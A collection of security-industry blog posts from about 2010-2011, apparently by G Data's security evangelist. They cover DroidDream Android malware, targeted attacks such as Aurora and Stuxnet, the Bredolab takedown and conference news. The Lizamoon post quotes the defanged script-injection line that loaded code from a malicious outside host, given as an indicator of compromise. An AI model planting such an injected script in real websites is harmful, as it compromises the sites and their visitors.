Mobile Payments, DroidDream and a Reactive Policy Add up to Major Headaches
Malware writers are entrepreneurs who are always looking for the best return on investment. The Android operating system, combined with the Google Wallet Service, will offer a record-setting ROI if current policies continue. Let’s look at why.
According to Gartner and IDC, Android is the market leader in mobile operating systems, so it is logical that cyber criminals will target the platform. Android malware can easily be spread through apps, which makes it an attractive target. Not only did the beginning of 2011 see the emergence of this trend, but soon Android will take the lead as the most targeted mobile operating systems in terms of malware.
A lot of problems result from the fact that apps can be distributed via different online shops and channels. And nobody, except for security experts, is looking for malware inside the apps.
The first proof of the official Android Market being interesting for cybercriminals was reported in March 2011, called DroidDream, a family of malware which uses a pair of exploits to gain root access on vulnerable Android devices. A large number of Android applications was reported to be infected and all were pulled from the Android Market after it was reported to Google. All of the applications were versions of legitimate programs that were Trojan-ised and rebuilt by the malware authors, loaded with malicious code. DroidDream sends a collection of information like IMEI, IMSI, OS version, etc. to the attacker and then attempts to download additional software and payloads.
AMTSO, CARO and EICAR – conferences and events – an overview
The beginning of May was dedicated to three traditionally important security industry events of the year. It started with an AMTSO Meeting, then the CARO Workshop followed and it ended with the EICAR Conference. I participated for G Data in all of them!
You can find the original posting of this article at the G Data Security blog.
G Data is one of the members of AMTSO (www.amtso.org), an organization currently comprised of around 40 members, representing testers, vendors, academics and publishers involved in anti-malware research. I was at the last AMTSO members’ meeting which was held in Prague. As always, a lot of work was done during the workshops: The document “AMTSO Guidelines on Facilitating Testability” was initiated at the suggestion of testers and developed jointly by testers and vendors. The new paper is the latest in a succession of guidelines and best practice documents already published. The AMTSO members also agreed to expand the range of documentation the organization produces to include more educational material. They also introduced changes to the voting procedure to ensure that documents cannot be approved by the members unless a majority of testers agree that the content is up to standard. This step mentioned last is designed to avoid any possibility of bias in favor of any group within the organization.
The Rise of the Targattacks*: Cyber espionage and sabotage: the new way
*Abbr.: targeted attacks
During the last 18 months we saw a growing number of targeted attacks against numerous companies and organizations. Let’s briefly have a look at some of them:
- The Aurora Attack: an attack that began in mid 2009 and continued until December 2009. The primary goal of this attack was to gain access to high tech, security and defense companies and potentially modify source code repositories. For example at Adobe, Juniper, Google, Yahoo, etc…
- German Emissions Trading Authority (DEHSt): suffered from phishing attacks carried out in January 2010. Scamsters circulated their fraudulent emails masquerading as email from the DEHSt and persuaded the recipients to login to a counterfeit website, ironically to protect themselves against alleged hacker attacks. Using the stolen access data, the attackers transferred emissions permits, primarily to Denmark and Great Britain, and in so doing allegedly gained up to three million Euros illegally. It is readily apparent that targeted phishing attacks can be very lucrative.
- Stuxnet: a Windows computer worm discovered in July 2010 that targets industrial SCADA software and equipment with the aim of attacking an Iranian nuclear plant. The attack seems to have been successful as the enrichment of Uranium was heavily delayed.
- G20 Files attack: was announced in March 2011 but had already been going on for several months. The G20 is made up of the finance ministers and central bank governors of 19 countries and discusses key issues of the global economy. Over 150 ministry computers of the G20 were attacked. The attacks aimed at files related to the G20 meetings.
- RSA breach: RSA is a well known security company specialized in identity and access solutions. Hackers may have gained access to part of the code generation algorithm used in RSA SecurID tokens. At least some information was extracted but it’s still unsure if it will actually cause future problems.
- EU Commission Summit attack: this was a targeted attack against some specific servers at the EU Commission in Brussels, found and stopped before the EU March 2011 Summit. As not much is known about it, we suppose that nothing important has been leaked.
- Epsilon email breach: Epsilon is a well known online marketing company that is working with hundreds of large companies around the world and stores millions of email addresses in its databases. Hackers have stolen customer email addresses and names belonging to a “subset of its clients”. Some big companies such as Disney, Citibank, Verizon, etc … were involved.
And this list is still not complete.
It never stays quiet on the internet: The Lizamoon attack, the update problem?
It never stays quiet on the internet and new attacks or malware are seen every day. The last week however we saw an interesting mass SQL injection attack, referred to as Lizamoon, which was spreading and has infected several millions of URLs last week (March 29 until April 4). Even after a week, thousands of comprised websites don’t seem to be cleaned up, yet.
What are we talking about?
The mentioned attack uses SQL injection techniques to insert rogue code into the databases of websites. SQL injection is a code injection technique that misuses available functionality that is not filtered away properly. In other words: The vulnerability is present when user input is not correctly filtered for escape characters embedded in SQL statements or if the input is not strongly typed and by this unexpectedly executed (cf.: Wikipedia).
The following code was injected into a large number of websites:
<script src=hxxp://lizamoon . com / ur . php >
CeBIT 2011 and G Data
CeBIT starts on March 1st in Hannover, showcasing the latest developments in the IT industry. G Data is using the largest IT trade show in the world this year to launch the next generation of security for businesses and home users. G Data presents this year’s trade fair highlight: Generation 11 of its network solutions, equipped with a powerful backup module in all Enterprise versions. Also being revealed is G Data MobileSecurity, a security solution for Android phones. Mobile phone owners will thus be able to effectively secure their mobiles against malware. Another first that will be announced in Hannover is G Data CloudSecurity. This free browser plug-in blocks infected websites,making surfing the internet more secure. Besides presenting these innovations, the provider from Bochum, Germany is also offering a comprehensive programme in the G Data Arena, Hall 11, Booth D35.
I personally will take part in the Global Conferences during a panel session about the importance of security which is detailed below. It’s an interesting line up of experienced speakers, CEO’s or VP’s which will be sitting next to me. I will be available for interviews and chats the whole week (minus Saturday) at our booth. By the way I like my new title: Global Security Officer. ;-)
Upcoming meetings and events like AMTSO, RSA, CeBIT, etc …
It seems that my busy months are coming up with a lot of travelling. Very soon you can see me speaking at some national and international events.
Close to my home you can find me at ‘This is IT’ in the Netherlands www.apeldoorn-it.nl/congres (3 February 2011). The week afterwards I will teach the teachers at the ICT day for teachers in Belgium http://www.ictdag.be/ (7 February 2011). After this I will be travelling to San Francisco for AMTSO and the RSA conference (14-18 February 2011). The AMTSO members’ meeting will be held at San Mateo, California, on the 10th-11th February, just before RSA. I’m pretty sure that everybody will find some interesting material coming out of the organization in the next few weeks. There’s more information on this year’s AMTSO meetings on the AMTSO meetings page at http://www.amtso.org/meetings.html, including a preliminary agenda.
And don’t forget CeBIT (1-5 March 2011). This year G Data will take an active part in the very famous CeBIT Global Conferences in Hannover. Dr. Dirk Hochstrate will attend the IT-Security panel on Wednesday, 2 March. On the Global Conferences only the top spokesmen of the IT branch are invited to discuss new trends and their visions for the future. At the same moment you can go to our English press conference where you will see me in front of the room.
I will give you more info about our upcoming CeBIT events soon.
New interesting moves from AMTSO during the last meeting in Munich, Germany
This is a copy from the original posting at the G Data Security Blog.
G Data is one of the members of AMTSO (www.amtso.org), an organisation currently comprised of 37 members, representing testers, vendors, academics and publishers involved in anti-malware research. Last week I was at the last AMTSO members’ meeting which was held in Munich. As always, a lot of work was done during the workshops.
First of all, some guidelines about testing for false positives (FP) were adopted. The False Positive issue is a common problem and the security industry dedicates a lot of resources to ensuring the highest quality and to reduce False Positives heavily. We welcome the new joint guidelines related to testing of false positives and we are hoping that in the light provided by these new guidelines, the FPs from all security products will be much more fairly assessed. The new documents can be found at www.amtso.org/documents.html.
A critical look at the major takedown of BredoLab by the Dutch High Tech Crime Unit: More International Cybercrime laws needed!
Yesterday, 25 October 2010, The Dutch High Tech Crime Unit of the KLPD announced a major takedown of a large botnet, known as Bredolab.
You can find more and a copy of this blog entry at the original G Data posting page.
Bredolab is a big family of polymorphic Trojans and has been thought to install parts of the Cutwail botnet in the past. The botnet has spread through drive-by-downloads and email. Bredolab is known to send out large email spam campaigns and the installation of fake security products. The Dutch company LeaseWeb was hosting this botnet, without their knowledge. After the company was informed about this fact, they gave full cooperation to the authorities to take the botnet down.
Even though this was the largest operation against cyber crime in the Netherlands so far, it was not unique. It has been done in serveral other countries before, like the US, Spain and even in the Netherlands. The striking point is how things will be handled from here. The High Tech Crime unit will use the existing botnet infrastructure to send a program to all infected machines, showing them a warning : “Users of computers with viruses from this network will receive a notice at the time of next login with information on the degree of infection.” This screen is shown in a video. Click the following direct link to see it: http://teamhightechcrime.nationale-recherche.nl/nl_infected.php
New website and the start of my world tour
You possibly already found out by now that I refurbished my personal website otherwise you weren’t reading this.
I really hope you like the new look of this site which took us several weeks to come up with. It was really necessary after a long period of silence I think.
With this new look I’m also starting my world tour where I sometimes will attend some conferences and sometimes will speak at these events.
Just finished with our G Data’s press tour in the Benelux I’m ready for the next events:
- BruCon Conference: Brussels, Belgium (attending)
- Virus Bulletin Conference: Vancouver, Canada (speaking together with Righard Zwienenberg(Norman) about internal attacks and problems in the cloud)
- Infosecurity NL: Utrecht, The Netherlands (attending)
- AAVAR Conference: Bali (speaking together with David Harley(Eset) and Lysa Myers(Westcoast Labs) about product evaluation and malware simulation)
- G Data Japan Press Tour: Tokyo (speaking)
And this is just the beginning … more trips are planned even during the writing of this piece.
One trip could be very interesting but it’s still undecided if I will participate …. but stay tuned as I could meet some VIPS of the world. ;-)
Could the DLL-hijacking problem be underestimated?
This is a small copy of the official G Data Blog
Find the full and official version at www.gdatasoftware.com
Last week, HD Moore released details about a serious DLL problem under Windows. HD Moore is known as developer of the Metasploit application.
After a week, Microsoft released more information, discussing bad practices in DLL loading that could lead to remote exploitation, which is the main source of this problem. They have recently released tools which can help mitigating the risk. But the real and possibly best solution is for developers to patch their applications to follow best practices.
There is little that can be done by those of us in the security community, or Microsoft for that matter, as many applications are designed to take advantage of this flaw and it could take many weeks or months for application developers to release better designed programs and encourage users to update to these new versions. Some of the programs will be updated automatically, some of them won’t. The patches Microsoft is offering do work, but it could make several programs unusable and prevent them from backward compatibility.
The Microsoft LNK / USB worm / rootkit ‘issue’ will kill WIN XP SP2 and WIN2000 earlier…
Just recently, reports were released about a new kind of malware propagating through removable drives. The said malware exploits a newly-discovered vulnerability in shortcut files, which allows random code to be executed on the user’s system. Microsoft has officially acknowledged the vulnerability and released a security advisory.
The malware some of the AV industry detects as Win32/Stuxnet, unfortunately, is a worm (and rootkit) of a slightly different colour. It can propagate making use of a 0-day vulnerability described here and also listed by CVE as CVE-2010-2568.
The biggest problem is that Windows (specifically, the Windows Shell) can be tricked into executing malicious code presented in a specially-crafted shortcut (.LNK) file linking, in turn, to a malicious DLL (Dynamic Link Library).
The problem is in the way that Windows Shell fails to parse the shortcut correctly when it loads the icon, it isn’t necessary to click the icon for the malicious code to be executed! The code will be executed without any action on the part of the user once that folder is opened to access whatever legitimate files are on the device.
G Data SecurityLabs expands team with Security Evangelist Eddy Willems
The English and French version of the press release …
G Data SecurityLabs expands team with Security Evangelist Eddy Willems
Bochum, 19. February 2010
G Data today announces they have a new team member: Security Evangelist Eddy Willems. He will divide his time between the G Data SecurityLabs in Bochum (Germany) and the Benelux team.
The Belgian Willems has been active in the field of IT security for over two decades. In that period, he has worked for influential institutes, such as EICAR, of which he is a co-founder and the director of press and information, several CERT associations, and the organization behind the Wildlist as well as for commercial companies, such as NOXS and Kaspersky Labs Benelux.
In his position of Security Evangelist at G Data, Eddy Willems will form the link between technical complexity and the user. He is responsible for a clear communication of G Data’s SecurityLabs towards the security community, press, distributors, resellers and end users. This means, amongst other things, organizing trainings about products, malware and security, speaking at conferences and consulting associations and companies about security.